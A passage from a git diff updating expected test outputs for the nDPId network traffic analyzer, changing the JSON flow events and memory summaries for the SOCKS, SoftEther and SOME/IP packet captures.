00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1386004317979,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004317979,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAZFdAAEAGh0YKtJy5CrSc+dEfBDg7J\/Q2AAAAALAC\/\/\/NpwAAAgQFtAEDAwQBAQgKFh7\/ZwAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1386004317980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004317980,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R8tB48eOyf0N6ASOJB5EQAAAgQFtAQCCApiYA5xFh7\/ZwEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1386004317980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004317980,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0jiVAAEAGXYQKtJy5CrSc+dEfBDg7J\/Q3LQePH4AQICvAQgAAAQEIChYe\/2diYA5x"} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1386004309468,"flow_last_seen":1386004309478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1754,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1386004312331,"flow_last_seen":1386004312384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1770,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1386004309468,"flow_last_seen":1386004309478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1754,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1386004312331,"flow_last_seen":1386004312384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1770,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-payload-len":5287,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1386004317989} @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879041 bytes -~~ total memory freed........: 5879041 bytes -~~ total allocations/frees...: 118171/118171 +~~ total memory allocated....: 6012675 bytes +~~ total memory freed........: 6012675 bytes +~~ total allocations/frees...: 120933/120933 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 474 chars ~~ json string max len.......: 699 chars diff --git a/test/results/softether-http.pcap.out b/test/results/softether-http.pcap.out index 68302bde7..42d42761a 100644 --- a/test/results/softether-http.pcap.out +++ b/test/results/softether-http.pcap.out @@ -4,7 +4,7 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642993710968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642993710968,"pkt":"eJS0JASgYDjgxTWgCABFAAA8GPRAAD8GkfDAqAJkgp5LLZKAAFAJq5FAAAAAAKAC+vCRBgAAAgQFtAQCCApgbIO7AAAAAAEDAwY="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642993711225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642993711225,"pkt":"YDjgxTWgeJS0JASgCABFAAA8XxtAAHAGGsmCnkstwKgCZABQkoDyj0KZCauRQaASIAAzDwAAAgQFrAEDAwgEAggKBdAXMmBsg7s="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642993711226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642993711226,"pkt":"eJS0JASgYDjgxTWgCABFAAA0GPVAAD8GkffAqAJkgp5LLZKAAFAJq5FB8o9CmoAQA+yQ\/gAAAQEICmBshL0F0Bcy"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642993710968,"flow_last_seen":1642993711226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1642993711226,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"130.158.75.45","src_port":37504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Softether","breed":"Acceptable","category":"VPN"},"http": {"hostname":"x0.x0.dev.open.servers.ddns.softether-network.net","url":"x0.x0.dev.open.servers.ddns.softether-network.net\/ddns\/ddns.aspx?v=9291257684825389030","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko\/20100101 Firefox\/29.0"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642993710968,"flow_last_seen":1642993711226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1642993711226,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"130.158.75.45","src_port":37504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Softether","breed":"Acceptable","category":"VPN"},"http": {"hostname":"x0.x0.dev.open.servers.ddns.softether-network.net","url":"x0.x0.dev.open.servers.ddns.softether-network.net\/ddns\/ddns.aspx?v=9291257684825389030","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko\/20100101 Firefox\/29.0"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"softether-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642993710968,"flow_last_seen":1642993711226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1642993711226,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"130.158.75.45","src_port":37504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"softether-http.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":1112,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1642993711226} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869765 bytes -~~ total memory freed........: 5869765 bytes -~~ total allocations/frees...: 118122/118122 +~~ total memory allocated....: 6003399 bytes +~~ total memory freed........: 6003399 bytes +~~ total allocations/frees...: 120884/120884 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 948 chars diff --git a/test/results/someip-tp.pcap.out b/test/results/someip-tp.pcap.out index 6819d0fea..51160f1ca 100644 --- a/test/results/someip-tp.pcap.out +++ b/test/results/someip-tp.pcap.out @@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1433332443506} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1433332443506,"flow_last_seen":1433332443506,"flow_idle_time":200000,"flow_min_l4_payload_len":1412,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1412,"flow_avg_l4_payload_len":1412,"midstream":0,"thread_ts_msec":1433332443506,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02350{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1433332443506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1433332443506,"pkt":"bAAAAAAOdAAAAADhCABFAAWgNUcAAIARAAAKAAHPCgABAd3ERxEFjBxtAQEACQAABXwAAAAFAQEgAAAAAAEAADAAAAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpams="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1433332443506,"flow_last_seen":1433332443506,"flow_idle_time":200000,"flow_min_l4_payload_len":1412,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1412,"flow_avg_l4_payload_len":1412,"midstream":0,"thread_ts_msec":1433332443506,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1433332443506,"flow_last_seen":1433332443506,"flow_idle_time":200000,"flow_min_l4_payload_len":1412,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1412,"flow_avg_l4_payload_len":1412,"midstream":0,"thread_ts_msec":1433332443506,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 02351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1433332443519,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1433332443519,"pkt":"bAAAAAAOdAAAAADhCABFAAWgNUgAAIARAAAKAAHPCgABAd3ERxEFjBxtAQEACQAABXwAAAAFAQEgAAAABXFsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2ts="} 02353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1433332443524,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1433332443524,"pkt":"bAAAAAAOdAAAAADhCABFAAWgNUkAAIARAAAKAAHPCgABAd3ERxEFjBxtAQEACQAABXwAAAAFAQEgAAAACuHc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5\/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs\/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7\/Dx8vP09fb3+Pn6+\/z9\/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4\/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr\/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u\/w8fLz9PX29\/j5+vv8\/f7\/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6\/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t\/g4eLj5OXm5+jp6uvs7e7v8PHy8\/T19vf4+fr7\/P3+\/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSks="} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1433332443506,"flow_last_seen":1433332443605,"flow_idle_time":200000,"flow_min_l4_payload_len":1176,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":12472,"flow_avg_l4_payload_len":1385,"midstream":0,"thread_ts_msec":1433332443605,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 